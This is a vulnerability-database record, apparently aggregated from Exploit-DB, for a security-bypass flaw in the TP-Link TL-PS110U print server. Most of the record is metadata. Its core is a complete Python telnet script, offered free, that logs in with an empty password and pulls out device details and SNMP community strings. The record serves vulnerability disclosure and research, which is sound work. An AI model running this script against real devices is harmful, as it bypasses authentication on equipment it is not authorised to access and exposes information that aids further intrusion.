ID
VAR-E-201306-0065
EDB ID
38591
TITLE
TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass.. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | tp link | model: | tl-ps110u print server | scope: | - | version: | - | Trust: 1.0 |
vendor: | tp link | model: | tl-ps110u | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/60682/info
TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
http://drupal.org/node/207891
import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Device Name" in i:
print i.strip()
if "Node ID" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Manufacture:" in i:
print i.strip()
if "Model:" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Community" in i:
print i.strip()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'tplink-enum.py' Security Bypass
Trust: 1.0
CREDITS
SANTHO
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 38591 | Trust: 1.9 |
db: | BID | id: | 60682 | Trust: 1.9 |
db: | EDBNET | id: | 59668 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/60682/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/38591/ | Trust: 0.6 |
url: | http://www.tp-link.com/en/ | Trust: 0.3 |
url: | http://www.tp-link.com/en/products/details/?model=tl-ps110u | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/38591 | Trust: 0.3 |
SOURCES
db: | BID | id: | 60682 |
db: | EXPLOIT-DB | id: | 38591 |
db: | EDBNET | id: | 59668 |
LAST UPDATE DATE
2022-07-27T09:15:44.332000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 60682 | date: | 2013-06-19T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 60682 | date: | 2013-06-19T00:00:00 |
db: | EXPLOIT-DB | id: | 38591 | date: | 2013-06-19T00:00:00 |
db: | EDBNET | id: | 59668 | date: | 2013-06-19T00:00:00 |